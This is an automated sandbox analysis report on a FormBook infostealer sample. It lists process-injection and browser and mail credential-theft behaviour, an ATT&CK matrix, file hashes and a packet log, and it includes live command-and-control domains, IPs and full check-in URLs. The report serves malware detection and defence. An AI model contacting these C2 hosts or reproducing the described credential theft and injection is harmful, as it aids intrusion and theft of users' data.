Source: Yara match | File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

      Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Shared Modules | Path Interception | 812 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 812 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 114 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Connections Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph (ID: 756156, Sample: NHYGUnNN.exe, Startdate: 29/11/2022, Architecture: WINDOWS, Score: 100)

Start: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
NHYGUnNN.exe (started): dropped C:\Users\user\AppData\...22HYGUnNN.exe.log, CSV; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
RegSvcs.exe (started by NHYGUnNN.exe): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
explorer.exe (injected by RegSvcs.exe): www.y31jaihdb6zm87.buzz 154.209.6.241, 49721, 49722, 49723 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK Seychelles; www.dersameh.com 89.31.143.1, 49715, 49716, 49717 QSC-AG-IPXDE Germany; 4 other IPs or domains; System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
NETSTAT.EXE (started by explorer.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process

Source | Detection | Scanner | Label | Link
NHYGUnNN.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
NHYGUnNN.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
1.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m | 0% | Avira URL Cloud | safe |
http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed | 0% | Avira URL Cloud | safe |
http://www.y31jaihdb6zm87.buzz/4u5a/ | 0% | Avira URL Cloud | safe |
www.needook.com/4u5a/ | 0% | Avira URL Cloud | safe |
http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s | 0% | Avira URL Cloud | safe |
http://www.marketmall.digital/4u5a/ | 0% | Avira URL Cloud | safe |
http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 | 0% | Avira URL Cloud | safe |
http://www.darkchocolatebliss.com/4u5a/ | 0% | Avira URL Cloud | safe |
http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s | 0% | Avira URL Cloud | safe |
http://www.dersameh.com/4u5a/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.darkchocolatebliss.com | 54.38.220.85 | true | true | | unknown
www.marketmall.digital | 162.213.255.142 | true | true | | unknown
www.canadianlocalbusiness.com | 172.67.148.132 | true | true | | unknown
www.y31jaihdb6zm87.buzz | 154.209.6.241 | true | true | | unknown
www.ope-cctv.com | 38.55.236.89 | true | true | | unknown
www.dersameh.com | 89.31.143.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.y31jaihdb6zm87.buzz/4u5a/ | true | Avira URL Cloud: safe | unknown
http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m | true | Avira URL Cloud: safe | unknown
http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed | true | Avira URL Cloud: safe | unknown
http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s | true | Avira URL Cloud: safe | unknown
http://www.marketmall.digital/4u5a/ | true | Avira URL Cloud: safe | unknown
www.needook.com/4u5a/ | true | Avira URL Cloud: safe | low
http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 | true | Avira URL Cloud: safe | unknown
http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s | true | Avira URL Cloud: safe | unknown
http://www.dersameh.com/4u5a/ | true | Avira URL Cloud: safe | unknown
http://www.darkchocolatebliss.com/4u5a/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | 1--Lt08NN.10.dr | false | | high
https://search.yahoo.com?fr=crmas_sfp | 1--Lt08NN.10.dr | false | | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | 1--Lt08NN.10.dr | false | | high
https://duckduckgo.com/ac/?q= | 1--Lt08NN.10.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 1--Lt08NN.10.dr | false | | high
https://search.yahoo.com?fr=crmas_sfpf | 1--Lt08NN.10.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 1--Lt08NN.10.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 1--Lt08NN.10.dr | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 1--Lt08NN.10.dr | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | 1--Lt08NN.10.dr | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
38.55.236.89 | www.ope-cctv.com | United States | | 174 | COGENT-174US | true
89.31.143.1 | www.dersameh.com | Germany | | 15598 | QSC-AG-IPXDE | true
172.67.148.132 | www.canadianlocalbusiness.com | United States | | 13335 | CLOUDFLARENETUS | true
54.38.220.85 | www.darkchocolatebliss.com | France | | 16276 | OVHFR | true
162.213.255.142 | www.marketmall.digital | United States | | 22612 | NAMECHEAP-NETUS | true
154.209.6.241 | www.y31jaihdb6zm87.buzz | Seychelles | | 136970 | YISUCLOUDLTD-AS-APYISUCLOUDLTDHK | true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 756156
Start date and time: 2022-11-29 18:23:12 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 47s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NHYGUnNN.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/2@6/6
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 41.7% (good quality ratio 36.2%)
• Quality average: 71.1%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
• Execution Graph export aborted for target NHYGUnNN.exe, PID 5380 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
                                        No simulations
No context
Process: C:\Users\user\Desktop\NHYGUnNN.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.354940450065058
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5: B10E37251C5B495643F331DB2EEC3394
SHA1: 25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256: 8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512: 296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious: true
Reputation: moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                        Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.2891393435168748
                                        Encrypted:false
                                        SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                        MD5:037D23498B81732EEAAAD0E8015F3F85
                                        SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                        SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                        SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.833885184563826
                                        TrID:
                                        • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                        • Win64 Executable GUI (202006/5) 44.25%
                                        • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                        • Win64 Executable (generic) (12005/4) 2.63%
                                        • Generic Win/DOS Executable (2004/3) 0.44%
                                        File name:NHYGUnNN.exe
                                        File size:275456
                                        MD5:4f9c8432b57fa1aa875071de547ba947
                                        SHA1:e1cc52fd851621743ba562a65161bfafed8e6b2b
                                        SHA256:9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
                                        SHA512:ced221c2e5225a8ead486e52f1c5307b24dbaff8864c7262f2d6f58cad3184753d1f2afe525c3afa122ddcafeab38845dafd2f7a22169bfac026375e7962481d
                                        SSDEEP:6144:RhwendE8+/O+oImP2Qcy7ZwpeA9pg6Cer0K7+UUcT9gxyRClRcOpoik:EAHdP7ZwpeApT0K7+UUQ99RORcOpoR
                                        TLSH:B24401917785748FC98ECF3B86A03859097991733B0BD39B94423CA9491E3DE5E13BA3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......c..............0......0........... ....@...... ....................................`...@......@............... .....
                                        Icon Hash:30f0c4ccccc6b010
                                        Entrypoint:0x400000
                                        Entrypoint Section:
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6385B386 [Tue Nov 29 07:23:50 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:
                                        Instruction
                                        dec ebp
                                        pop edx
                                        nop
                                        add byte ptr [ebx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al
                                         Name | Virtual Address | Virtual Size | Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x1714 | .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3e660 | 0x1c | .text
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                         Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                         .text | 0x2000 | 0x41628 | 0x41800 | False | 0.9183936665076335 | data | 7.879743437690199 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                         .reloc | 0x44000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                         .rsrc | 0x46000 | 0x1714 | 0x1800 | False | 0.265625 | data | 4.38448712577448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         Name | RVA | Size | Type | Language | Country
                                         RT_ICON | 0x46130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | |
                                         RT_GROUP_ICON | 0x471d8 | 0x14 | data | |
                                         RT_VERSION | 0x471ec | 0x33c | data | |
                                         RT_MANIFEST | 0x47528 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
                                         Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                         11/29/22-18:25:42.914102 | TCP | 2829004 | ETPRO TROJAN FormBook CnC Checkin (POST) | 49722 | 80 | 192.168.2.6 | 154.209.6.241
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Nov 29, 2022 18:25:06.857711077 CET | 49714 | 80 | 192.168.2.6 | 38.55.236.89
                                         Nov 29, 2022 18:25:07.176563978 CET | 80 | 49714 | 38.55.236.89 | 192.168.2.6
                                         Nov 29, 2022 18:25:07.177164078 CET | 49714 | 80 | 192.168.2.6 | 38.55.236.89
                                         Nov 29, 2022 18:25:07.177280903 CET | 49714 | 80 | 192.168.2.6 | 38.55.236.89
                                         Nov 29, 2022 18:25:07.495994091 CET | 80 | 49714 | 38.55.236.89 | 192.168.2.6
                                         Nov 29, 2022 18:25:07.496047974 CET | 80 | 49714 | 38.55.236.89 | 192.168.2.6
                                         Nov 29, 2022 18:25:07.496076107 CET | 80 | 49714 | 38.55.236.89 | 192.168.2.6
                                         Nov 29, 2022 18:25:07.496227980 CET | 49714 | 80 | 192.168.2.6 | 38.55.236.89
                                         Nov 29, 2022 18:25:07.496602058 CET | 49714 | 80 | 192.168.2.6 | 38.55.236.89
                                         Nov 29, 2022 18:25:07.815313101 CET | 80 | 49714 | 38.55.236.89 | 192.168.2.6
                                         Nov 29, 2022 18:25:12.533631086 CET | 49715 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:12.553531885 CET | 80 | 49715 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:12.553693056 CET | 49715 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:12.554054976 CET | 49715 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:12.573877096 CET | 80 | 49715 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:12.576395035 CET | 80 | 49715 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:12.576421022 CET | 80 | 49715 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:12.576509953 CET | 49715 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:13.563682079 CET | 49715 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:14.580615997 CET | 49716 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:14.601016045 CET | 80 | 49716 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:14.601304054 CET | 49716 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:14.601547003 CET | 49716 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:14.621640921 CET | 80 | 49716 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:14.621699095 CET | 80 | 49716 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:14.623873949 CET | 80 | 49716 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:14.623893976 CET | 80 | 49716 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.626898050 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.647209883 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.647319078 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.654036999 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.675849915 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.677865982 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.677930117 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.677973986 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.678021908 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.678031921 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.678061962 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.678066969 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.678113937 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.678148985 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:16.678157091 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.678191900 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.678610086 CET | 49717 | 80 | 192.168.2.6 | 89.31.143.1
                                         Nov 29, 2022 18:25:16.698600054 CET | 80 | 49717 | 89.31.143.1 | 192.168.2.6
                                         Nov 29, 2022 18:25:21.757518053 CET | 49718 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:21.776348114 CET | 80 | 49718 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:21.776595116 CET | 49718 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:21.776768923 CET | 49718 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:21.795433998 CET | 80 | 49718 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:21.795470953 CET | 80 | 49718 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:21.795599937 CET | 49718 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:22.783147097 CET | 49718 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:22.801913977 CET | 80 | 49718 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:23.803277016 CET | 49719 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:23.821763039 CET | 80 | 49719 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:23.821918011 CET | 49719 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:23.822163105 CET | 49719 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:23.840464115 CET | 80 | 49719 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:23.840503931 CET | 80 | 49719 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:23.840524912 CET | 80 | 49719 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:25.846643925 CET | 49720 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:25.865328074 CET | 80 | 49720 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:25.865495920 CET | 49720 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:25.865695000 CET | 49720 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:25.883969069 CET | 80 | 49720 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:25.884027958 CET | 80 | 49720 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:25.884074926 CET | 80 | 49720 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:25.884263992 CET | 49720 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:25.884419918 CET | 49720 | 80 | 192.168.2.6 | 54.38.220.85
                                         Nov 29, 2022 18:25:25.902769089 CET | 80 | 49720 | 54.38.220.85 | 192.168.2.6
                                         Nov 29, 2022 18:25:31.069607019 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:31.454494953 CET | 80 | 49721 | 154.209.6.241 | 192.168.2.6
                                         Nov 29, 2022 18:25:31.454699993 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:31.457118988 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:32.221436024 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
                                         Nov 29, 2022 18:25:32.471544981 CET | 49721 | 80 | 192.168.2.6 | 154.209.6.241
